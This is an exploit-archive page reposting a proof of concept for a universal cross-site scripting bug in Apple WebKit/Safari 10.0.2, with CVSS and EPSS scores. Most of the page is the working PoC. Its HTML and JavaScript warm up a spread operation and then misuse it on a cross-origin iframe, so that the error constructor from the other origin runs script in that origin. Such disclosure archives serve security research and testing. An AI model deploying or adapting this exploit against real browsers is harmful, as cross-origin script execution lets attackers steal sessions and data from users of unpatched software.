Advertisement






Apple WebKit/Safari 10.0.2 (12602.3.12.0.1) operationSpreadGeneric XSS

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2017-04-21
CPE
cpe:cpe:/a:apple:webkit_safari:10.0.2
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017040141

Below is a copy:

Apple WebKit/Safari 10.0.2 (12602.3.12.0.1) operationSpreadGeneric XSS<!--
Once a spread operation is optimized, the function |operationSpreadGeneric| will be called from then on. But operationSpreadGeneric's trying to get a JSGlobalObject from the argument of a spread operation.
 
It seems that that optimization is not implemented to the release version of Safari yet.
 
Tested on the Nighly 10.0.2(12602.3.12.0.1, r210957)
 
PoC:
-->
 
<body>
<script>
 
'use strict';
 
function spread(a) {
    return [...a];
}
 
let arr = Object.create([1, 2, 3, 4]);
for (let i = 0; i < 0x10000; i++) {
    spread(arr);
}
 
let f = document.body.appendChild(document.createElement('iframe'));
f.onload = () => {
    f.onload = null;
 
    try {
        spread(f.contentWindow);
    } catch (e) {
        e.constructor.constructor('alert(location)')();
    }
};
 
f.src = 'https://abc.xyz/';
 
</script>
</body>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum